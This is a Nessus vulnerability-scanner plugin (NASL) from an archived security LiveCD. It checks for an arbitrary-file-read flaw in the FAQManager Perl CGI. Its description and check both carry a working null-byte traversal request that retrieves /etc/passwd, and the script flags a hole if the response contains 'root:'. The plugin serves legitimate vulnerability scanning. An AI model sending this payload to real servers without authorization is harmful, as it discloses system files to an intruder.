home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / faqmanager.nasl < prev    next >
Text File  |  2005-03-31  |  2KB  |  66 lines

  1. #
  2. # This script was written by Matt Moore <matt.moore@westpoint.ltd.uk>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10837);
  10.  script_bugtraq_id(3810);
  11.  script_version ("$Revision: 1.4 $");
  12.  name["english"] = "FAQManager Arbitrary File Reading Vulnerability";
  13.  name["francais"] = "FAQManager Arbitrary File Reading Vulnerability";
  14.  script_name(english:name["english"], francais:name["francais"]);
  15.  
  16.  desc["english"] = "FAQManager is a Perl-based CGI for maintaining a list of 
  17. Frequently asked Questions. Due to poor input validation it is possible to 
  18. use this CGI to view arbitrary files on the web server. For example:
  19.  
  20. http://www.someserver.com/cgi-bin/faqmanager.cgi?toc=/etc/passwd%00
  21.  
  22. Solution: 
  23.  
  24. A new version of FAQManager is available at:
  25. www.fourteenminutes.com/code/faqmanager/
  26.  
  27. Risk factor : High";
  28.  
  29.  script_description(english:desc["english"]);
  30.  
  31.  summary["english"] = "Tests for FAQManager Arbitrary File Reading Vulnerability";
  32.  
  33.  script_summary(english:summary["english"]);
  34.  
  35.  script_category(ACT_ATTACK);
  36.  
  37.  script_copyright(english:"This script is Copyright (C) 2002 Matt Moore",
  38.         francais:"Ce script est Copyright (C) 2002 Matt Moore");
  39.  family["english"] = "CGI abuses";
  40.  family["francais"] = "Abus de CGI";
  41.  script_family(english:family["english"], francais:family["francais"]);
  42.  script_dependencie("find_service.nes", "no404.nasl");
  43.  script_require_ports("Services/www", 80);
  44.  exit(0);
  45. }
  46.  
  47. # Check starts here
  48.  
  49. include("http_func.inc");
  50. port = get_http_port(default:80);
  51.  
  52. if(get_port_state(port))
  53.  req = http_get(item:"/cgi-bin/faqmanager.cgi?toc=/etc/passwd%00", port:port);
  54.  soc = http_open_socket(port);
  55.  if(soc)
  56.  {
  57.  send(socket:soc, data:req);
  58.  r = http_recv(socket:soc);
  59.  http_close_socket(soc);
  60.  if("root:" >< r)    
  61.      security_hole(port);
  62.  
  63.  }
  64. }
  65.